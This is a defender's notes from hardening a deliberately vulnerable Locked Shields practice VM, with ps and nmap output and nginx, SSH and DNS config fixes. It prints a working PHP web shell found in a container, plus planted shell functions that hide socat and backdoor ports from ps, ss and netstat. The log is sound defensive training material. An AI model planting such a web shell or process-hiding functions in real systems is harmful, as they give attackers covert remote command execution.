# LS 2024 selection

### initial instructions

```txt
λ  sshpass -p Admin1Admin1 ssh root@64.227.120.192

Last login: Fri Feb  2 08:01:16 2024 from 31.220.83.175
 _                _            _  _____ _     _      _     _     ___  _  _
| |              | |          | |/ ____| |   (_)    | |   | |   |__ \| || |
| |     ___   ___| | _____  __| | (___ | |__  _  ___| | __| |___   ) | || |_
| |    / _ \ / __| |/ / _ \/ _` |\___ \| '_ \| |/ _ \ |/ _` / __| / /|__   _|
| |___| (_) | (__|   <  __/ (_| |____) | | | | |  __/ | (_| \__ \/ /_   | |
|______\___/ \___|_|\_\___|\__,_|_____/|_| |_|_|\___|_|\__,_|___/____|  |_|

Welcome to the very vulnerable VM, somewhat similar what we can expect at Locked
Shields.

There are few tasks for you:
- protect the VM preserving the following services in running (and secure)
  state:
  - web server
  - ssh server: all users (including root) should be allowed to login
  - dns server
- identify as many vulnerabilities in the VM as possible
- all passwords are set to `Admin1Admin1`. You are encouraged to change them.
- write down the vulnerabilities with short explanation what this vulnerability
  can cause
- write ansible playbook (preferred) or a bash script, which will mitigate the
  vulnerabilities and will still serve the web, ssh and dns services
- share the "documentation" with description of identified vulnerabilities and
  code to lockedshields@ssrd.io. Github links preferred.

Some notes:
- the VM will be forcefully shutdown so make changes permanent
- root user should be allowed to login from 138.68.128.150 with the following ssh
  keys:
    - ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
    - ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
- defense (and documentation, either through code or description) is more
  important than finding vulnerabilities
- you do not need to go into details explaining vulnerabilities
- we will share the planted vulnerabilities afterwards
```

### initial ps

```bash
root@ls-2024-9:~# ps auxf
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           2  0.0  0.0      0     0 ?        S    07:59   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [rcu_par_gp]
root           5  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [slub_flushwq]
root           6  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [netns]
root           7  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/0:0-cgroup_destroy]
root           8  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kworker/0:0H-events_highpri]
root           9  0.1  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:0-ext4-rsv-conversion]
root          10  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [mm_percpu_wq]
root          11  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [rcu_tasks_rude_]
root          12  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [rcu_tasks_trace]
root          13  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [ksoftirqd/0]
root          14  0.2  0.0      0     0 ?        I    07:59   0:00  \_ [rcu_sched]
root          15  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [migration/0]
root          16  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [idle_inject/0]
root          17  0.1  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/0:1-cgroup_destroy]
root          18  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [cpuhp/0]
root          19  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [kdevtmpfs]
root          20  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [inet_frag_wq]
root          21  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [kauditd]
root          22  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [khungtaskd]
root          23  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [oom_reaper]
root          24  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [writeback]
root          25  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [kcompactd0]
root          26  0.0  0.0      0     0 ?        SN   07:59   0:00  \_ [ksmd]
root          27  0.0  0.0      0     0 ?        SN   07:59   0:00  \_ [khugepaged]
root          73  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kintegrityd]
root          74  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kblockd]
root          75  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [blkcg_punt_bio]
root          76  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [tpm_dev_wq]
root          77  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [ata_sff]
root          78  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [md]
root          79  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [edac-poller]
root          80  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [devfreq_wq]
root          81  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [watchdogd]
root          82  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:1-ext4-rsv-conversion]
root          83  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kworker/0:1H-kblockd]
root          85  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [kswapd0]
root          86  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [ecryptfs-kthrea]
root          88  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kthrotld]
root          89  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [acpi_thermal_pm]
root          90  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:2-ext4-rsv-conversion]
root          91  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [scsi_eh_0]
root          92  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [scsi_tmf_0]
root          93  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [scsi_eh_1]
root          94  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [scsi_tmf_1]
root          95  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:3-events_unbound]
root          96  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [vfio-irqfd-clea]
root          97  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [mld]
root          98  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [ipv6_addrconf]
root         107  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kstrp]
root         110  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [zswap-shrink]
root         111  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kworker/u3:0]
root         116  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [charger_manager]
root         154  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [scsi_eh_2]
root         155  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [cryptd]
root         156  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [scsi_tmf_2]
root         214  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [raid5wq]
root         258  0.0  0.0      0     0 ?        S    07:59   0:00  \_ [jbd2/vda1-8]
root         259  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [ext4-rsv-conver]
root         353  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:4-flush-252:0]
root         357  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/0:2-events]
root         362  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kaluad]
root         363  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kmpath_rdacd]
root         364  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kmpathd]
root         365  0.0  0.0      0     0 ?        I<   07:59   0:00  \_ [kmpath_handlerd]
root         401  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:5-ext4-rsv-conversion]
root         404  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:6-flush-252:0]
root         816  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/0:3-events]
root        1209  0.0  0.0      0     0 ?        I    07:59   0:00  \_ [kworker/u2:7]
root           1  0.9  1.1 100872 11332 ?        Ss   07:59   0:02 /sbin/init
root         324  0.0  1.4  31768 14440 ?        S<s  07:59   0:00 /lib/systemd/systemd-journald
root         366  0.0  2.7 289316 27100 ?        SLsl 07:59   0:00 /sbin/multipathd -d -s
root         369  0.0  0.6  22780  6284 ?        Ss   07:59   0:00 /lib/systemd/systemd-udevd
systemd+     436  0.0  0.8  16252  8436 ?        Ss   07:59   0:00 /lib/systemd/systemd-networkd
systemd+     442  0.0  0.6  89360  6476 ?        Ssl  07:59   0:00 /lib/systemd/systemd-timesyncd
root         459  0.0  0.0   1088    52 ?        S    07:59   0:00 nftablesd
message+     521  0.0  0.4   8560  4508 ?        Ss   07:59   0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         528  0.0  1.9  33108 19412 ?        Ss   07:59   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         529  0.0  2.8 220240 28048 ?        Ss   07:59   0:00 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf)
www-data     591  0.0  1.4 220680 14560 ?        S    07:59   0:00  \_ php-fpm: pool www
www-data     592  0.0  1.0 220680 10260 ?        S    07:59   0:00  \_ php-fpm: pool www
syslog       532  0.0  0.5 222404  5352 ?        Ssl  07:59   0:00 /usr/sbin/rsyslogd -n -iNONE
root         534  1.5  2.7 1245220 27752 ?       Ssl  07:59   0:03 /usr/lib/snapd/snapd
root         535  0.0  0.6  14908  6392 ?        Ss   07:59   0:00 /lib/systemd/systemd-logind
unbound      575  0.0  1.6  30168 16312 ?        Ss   07:59   0:00 /usr/sbin/unbound -d -p
mysql        608  1.5 39.4 1322632 391232 ?      Ssl  07:59   0:03 /usr/sbin/mysqld --skip-grant-tables
root         638  0.0  0.2  55936  2456 ?        Ss   07:59   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data     639  0.0  0.6  56552  6084 ?        S    07:59   0:00  \_ nginx: worker process
root         815  0.0  0.4 1230260 4348 ?        Ssl  07:59   0:00 /opt/digitalocean/bin/droplet-agent
root         820  0.0  0.2   7288  2820 ?        Ss   07:59   0:00 /usr/sbin/cron -f -P
daemon       834  0.0  0.1   3864  1236 ?        Ss   07:59   0:00 /usr/sbin/atd -f
root         835  0.0  0.4   9496  4336 ?        Ss   07:59   0:00 /usr/sbin/fwknopd
root         843  0.0  0.1   6220  1164 ttyS0    Ss+  07:59   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220
root         845  0.0  0.1   6176  1060 tty1     Ss+  07:59   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         860  0.0  0.9  15432  9408 ?        Ss   07:59   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1660  0.0  1.0  16000 10008 ?        Ss   08:01   0:00  \_ sshd: root@pts/0
root        1667  0.0  0.4   5684  4952 pts/0    Ss   08:01   0:00      \_ -bash
root        1679  0.0  0.3   7208  2980 pts/0    R+   08:03   0:00          \_ ps auxf
root         978  0.0  0.2   9688  2416 ?        Ss   07:59   0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root        1147  0.0  0.2  82724  2112 ?        Ssl  07:59   0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
root        1151  0.0  2.4  82904 24156 ?        Ss   07:59   0:00  \_ apache2 -DFOREGROUND
www-data    1202  0.0  0.9  83212  9388 ?        S    07:59   0:00      \_ apache2 -DFOREGROUND
www-data    1203  0.0  0.9  83212  9432 ?        S    07:59   0:00      \_ apache2 -DFOREGROUND
www-data    1204  0.0  0.9  83212  9432 ?        S    07:59   0:00      \_ apache2 -DFOREGROUND
www-data    1205  0.0  0.9  83212  9432 ?        S    07:59   0:00      \_ apache2 -DFOREGROUND
www-data    1206  0.0  0.9  83212  9436 ?        S    07:59   0:00      \_ apache2 -DFOREGROUND
root        1651  0.0  0.4  41224  4792 ?        Ss   07:59   0:00 /usr/lib/postfix/sbin/master -w
postfix     1654  0.0  0.7  41564  7340 ?        S    07:59   0:00  \_ pickup -l -t unix -u -c
postfix     1655  0.0  0.7  41608  7392 ?        S    07:59   0:00  \_ qmgr -l -t unix -u
postfix     1662  0.0  1.3  48160 13808 ?        S    08:01   0:00  \_ smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix     1664  0.0  1.2  47332 12188 ?        S    08:01   0:00  \_ tlsmgr -l -t unix -u -c
postfix     1665  0.0  0.6  41560  6876 ?        S    08:01   0:00  \_ anvil -l -t unix -u -c
postfix     1666  0.0  0.7  41572  7080 ?        S    08:01   0:00  \_ trivial-rewrite -n rewrite -t unix -u -c
```

### initially change root password

```bash
sshpass -p lockedshields2024 ssh root@64.227.120.192
```

### initial nmap scan

```bash
λ sudo nmap -sV -sC 64.227.120.192
[sudo] password for spagnologasper:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 09:08 CET
Nmap scan report for 64.227.120.192
Host is up (0.033s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 d9:de:f7:4d:0f:31:0e:82:3a:ad:c5:d4:c4:91:00:9a (ECDSA)
|_  256 b6:45:01:4e:3c:d7:b9:78:05:9d:4d:58:f7:1c:f1:c3 (ED25519)
25/tcp  open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after:  2034-01-29T14:36:57
|_smtp-commands: ls-2024-9, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
53/tcp  open  domain   Unbound 1.13.1
| dns-nsid:
|   id.server: ls-2024-9
|_  bind.version: unbound 1.13.1
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_  http/1.1
| tls-alpn:
|_  http/1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after:  2034-01-29T14:36:57
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: Host:  ls-2024-9; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds
```

### Web server

```
server {
        listen 443 ssl default_server;
        listen [::]:443 ssl default_server;
        #
        # Note: You should disable gzip for SSL traffic.
        # See: https://bugs.debian.org/773332
        #
        # Read up on ssl_ciphers to ensure a secure configuration.
        # See: https://bugs.debian.org/765782
        #
        # Self signed certs generated by the ssl-cert package
        # Don't use them in a production server!
        #
        include snippets/snakeoil.conf;

        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.html index.htm index.php;

        listen 80 default_server;
        server_name _;

        location /2048/ {
            proxy_pass http://localhost:8018/;
            proxy_set_header Host $host;
        }

        location / {
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
                try_files $uri $uri/ =404;
        }

        # pass PHP scripts to FastCGI server
        #
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;

        #       # With php-fpm (or other unix sockets):
                fastcgi_pass unix:/run/php/php-fpm.sock;
        #       # With php-cgi (or other tcp sockets):
        #       fastcgi_pass 127.0.0.1:9000;
        }

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        #location ~ /\.ht {
        #       deny all;
        #}
}
```
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.

Lets enable xss protection in the nginx configuration.

```bash
location /2048/ {
    proxy_pass http://localhost:8018/;
    proxy_set_header Host $host;
    # Add security headers
    add_header X-Frame-Options "SAMEORIGIN";
    add_header X-Content-Type-Options "nosniff";
    add_header X-XSS-Protection "1; mode=block";
}
```

And deny access to the all `.` files.

```bash
location ~ /\. {
    deny all;
}
```

The process is run by the `conmon` process.

```bash
root@ls-2024-9:~# sudo lsof -i :8018
COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
conmon  1147 root    5u  IPv4  19949      0t0  TCP *:8018 (LISTEN)

root        1147  0.0  0.2  82724  2112 ?        Ssl  07:59   0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
```

It is a podman container.

```bash
root@ls-2024-9:~# podman ps
CONTAINER ID  IMAGE                        COMMAND               CREATED      STATUS          PORTS                 NAMES
4d05d4a1a404  docker.io/nejec/2048:latest  apache2-foregroun...  2 hours ago  Up 2 hours ago  0.0.0.0:8018->22/tcp  2048
root@ls-2024-9:~#
```

When going into the container we can see the php reverse shell script.

```bash
root@ls-2024-9:~# podman exec -it  4d05d4a1a404   bash
root@4d05d4a1a404:/var/www/html# ls
app.js  assets  index.html  manifest.json  service-worker.js  shell.php  style.css
root@4d05d4a1a404:/var/www/html# cat shell.php
<!DOCTYPE html>
<html>
        <head>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1">
                <title>CMD</title>
                <style type="text/css">
                        body {
                                background: black;
                                font-family: courier,arial;
                                color: white;
                        }
                </style>
        </head>
        <body>
                <br/><br/><br/>
                <center>
                        <form method="POST">
                                <input type="text" name="cmd" placeholder="cmd" size=100/>
                                <input type="submit" value="exec"/>
                        </form>
                </center>
                <br/><br/><br/>
                <?php
                if(isset($_POST['cmd'])){
                        echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
                }
                ?>
        </body>
root@4d05d4a1a404:/var/www/html#
```

Lets remove the file now.

```bash
podman exec -it  4d05d4a1a404 rm -rf /var/www/html/shell.php
```

### Already f-up something

Typesets. Time to delete them
```bash
netstat ()
{
    command netstat "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
ps ()
{
    command ps "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
pstree ()
{
    command pstree "$@" | grep -Fv -e socat -e 2227 -e screen
}
quote ()
{
    local quoted=${1//\'/\'\\\'\'};
    printf "'%s'" "$quoted"
}
quote_readline ()
{
    local ret;
    _quote_readline_by_ref "$1" ret;
    printf %s "$ret"
}
ss ()
{
    command ss "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
```

Tried:

```bash
sudo grep -E "typeset|netstat|ps|pstree|ss" /etc/profile
grep -E "typeset|netstat|ps|pstree|ss" ~/.bashrc ~/.bash_profile
grep -rE "typeset|netstat|ps|pstree|ss" ~ /etc
```
No luck.

Lets try it differently
```bash
find / -path /proc -prune -o -type f -print0 | xargs -0 grep -E "typeset"
```

No signs so just
```
unset -f netstat ps pstree ss
```

And kill them all
```bash
root@ls-2024-9:/etc/ssh# ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*pid=//;s/,.*//'
1673
```

### e bit in pexec

```bash
root@ls-2024-9:/etc/ssh# lsattr /usr/bin/pexec
--------------e------- /usr/bin/pexec
```

But this should not be a problem, as it is not setuid.

### SSH

Lets not allow the empty password login
and not password login..
```bash
PermitEmptyPasswords yes -> no
PasswordAuthentication no -> no ? (this is wierd becouse I was able to login with password)
```

And I was still able to login using passowrd.
Nooooooo:
```bash
root@ls-2024-9:/etc/ssh/sshd_config.d# cat 50-cloud-init.conf
PasswordAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 /etc/ssh/ssh_host_echd_key
```

Lets remove all the other definitions and just include the 

```bash
AuthorizedKeysFile .ssh/authorized_keys
```
in the sshd config.

Now we will ssh using `ssh ls2024_prep`:

```config
Host ls2024_prep
    HostName 64.227.120.192
    User root
    Port 22
    IdentityFile ~/.ssh/keys/id_ed25519_ls2024_prep
```

### DNS

Problem here is that remote control is enabled and we can use it to get the root shell.

```txt
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
# default unbound control
remote-control:
    control-enable: yes
    control-interface: ::0
    control-use-cert: no
```

Lets disable remote control completely. and restart the service.

```bash
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
```

This is all I found suspicious in the DNS configuration.